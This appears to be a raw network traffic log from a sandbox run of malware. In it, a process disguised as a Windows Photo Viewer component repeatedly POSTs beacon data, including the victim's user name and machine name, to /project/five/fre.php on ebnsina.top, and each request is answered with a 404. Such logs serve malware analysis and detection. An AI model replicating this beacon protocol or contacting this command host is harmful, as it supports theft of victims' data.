97	192.168.2.4	49838	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:43.957175970 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:44.082529068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:44.379744053 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqQknTWz%2FWLAiiGA069QkAqAyYtq1eKQOsOzRjD3Xj%2FZ3n8F2im4rxLNZq%2BE8MU6wLDyHGG3cxRzTFg%2FhrjLgCoDsopnu2Q2eNJA17zYBkTT92MwhSQp9fbv6620NA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eed1f7a6c88-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49839	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:44.645217896 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:44.769838095 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:45.064080954 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gjl1bE4A7nKw1PODzROhhxZQOn9Po6XK8MEv%2FHqTu5gc8ovagX6FRbCD1g6mDcDYi6fiW8GBsPZIGuB9g3dL8fOzUcOYPlKmVC%2FU9PO1gy5bXCCtIfOqG1km%2B01fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ef1685e25a0-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49840	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:45.335994959 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:45.461213112 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:45.751863956 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=05%2BlXzOgwyi2eXdN8rk9pG2m1xO%2Bb7i9gtq5TISIawyJ0BPsP3PmGCjLpDAe975FUH8%2FfQxPhHZSMH5chGQ39aII2L%2BaUmP6XHVy3YzeC52tKw48wBJkbRFcXlw2rA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65ef5bba274c6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49841	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:46.022619963 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:46.148027897 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:46.588614941 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4BiMeyOedaR%2F2z7FXUJ%2FyM8d1z8%2FUep%2BcatL1Rot%2B%2ByZHrrLoQjCbkOYM4tyIYpeDu7kEQpHnn2FTe2anfDBapMEI%2FtqE19DVLv8cH5n9TlII03HBOqwQYckIGsBWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65efa0aebd9c1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49842	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:46.856471062 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:46.982182026 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:47.415154934 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ClRLrJJmxHRf4putnpnD1MqsgeHuy7AWt5ripCTkITRlRqGDreCRXHGGA0KwjSS155DlNug2X8VJE%2FlmX3LxYkLQ5DulatoHGABu1bmVOhC%2FYKzEjbatKGxWYHIN9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65eff3b157439-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49843	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:47.687505007 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:47.812503099 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:48.109585047 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2FHva35WBSZiHs9hviUlA0fH%2B%2FV4Nh9htMfkcn8oU6N60IR%2Bg7%2FKvGNiIZ8xytXkKR9zBuU7Hgru%2FUNgOCQENt4C0u%2FwgnmqeSd1r9xiy2RcmsCru6P8rDtCvLuKxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f0479ff02f1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49844	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:48.379698992 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:48.504187107 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:48.798671007 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=seKrhkN9wxDNFGwlkR4Bhx8UbN033nJnZkE16NYYploWNtGV7NKTgKfNDCB54ra%2FOxRVbLt8LyKzlVYh4DdR%2F5N9MbF3DjWv2tklBQjHjzmtatutG%2B1lHcVLf5Ec8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f08c85fdb09-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49845	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:49.062803984 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:49.187238932 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:49.483000040 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FICAbrG879P43sAzgwW5yaYzI7Y14%2Fc2CDjURLkiaZFVTg7gy%2Fwbe29n73EIwtQ1NzAmMBWZmkhT0D97BUoZPW8iTvf3GEd7mk2mBYgPIuB7jiFBC4MVwkaK5YLbaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f0d0b1a3343-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49846	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:49.748493910 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:49.873338938 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:50.168106079 CEST	627	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IcOJmt8sP3AD%2FYFrK%2BN4lUGIvnJEbkm3%2BQ%2BKVD2RBcpKgXum0WtM4GYR0kQlBwTMDzzIMGcGMioq75A3jPllIVO3mrXGCaHMGKTpQx221ZGUBXw%2BBGTS2TjU57O2wQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f1159e75c83-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49847	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:50.437190056 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:50.562014103 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:50.856304884 CEST	633	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J53lmMoOVYYdDgF8ud3UdC%2Bc7Sz%2BaJhskrn%2FDZDy0HRd%2FprbQPOUz5%2BGsI7u7JwN3Be0Ly9bwZHhlJ%2FadFLDCfI6f7WnrTsy%2FgrHC%2FbeRyVDf4QzFLlBSnPVGWJMQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f159cb221c1-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49848	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:51.126317978 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:51.250366926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:51.541656971 CEST	629	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6eGOCkzBd5Ke%2Bf1rkXVF%2BxwvMrZnWOJUfxAYlfaxGj5RvhQfXHgoduASpfCQKmVJ98NoF%2BC1D%2FYOz1MwMDThsZX0Cn5gXYHf4nH0FH4rvMR3%2F1%2FK4t8JvZ25MCTiiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f19e95ada6b-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49849	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:51.813477993 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:51.938059092 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:52.373929024 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymViJek2y00Atup94h4SudVDqS2HOD6eTlfQ%2B8%2F%2F3nT0qyEh1LFEsYQoLWRqg87Qwf4rTPsDbGTcpnFqRfSCDuzRz77%2F9DgawSrsr7czLJgsTeJ3lgn7QmC4kwDLbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f1e3b4a4c06-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49850	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:52.638175011 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:52.763309002 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:53.062553883 CEST	633	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q9nhg1Ixs%2BcsBj%2F%2BNjkrbRBMhp5L5SQV%2FsG7DelE6w3JuqxDe2fEMhEiPeOcvrThdaP7MOXZRT8D%2B9E7UYogTCEB3FdQqxNN80%2B0HG0Ddax5ZBxpn0Iq%2F2%2F5dprmMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f236fc15c63-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49851	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:53.324728966 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:53.449424982 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:38:53.752285957 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:38:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nF%2BI4v6Oho8TcHwftBCAWVGBhi0xOP80qDwiAEaM%2BrijBL3nSYnweSRyw4hvgg3GOPLjGWuveGM0HcheEGG9Cfci0G8WJcCFT0y6EjRNOAFKKV4DmJiQ4ZxHrPGPpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65f27a8bb7472-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49852	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:38:54.009984970 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:38:54.134341002 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
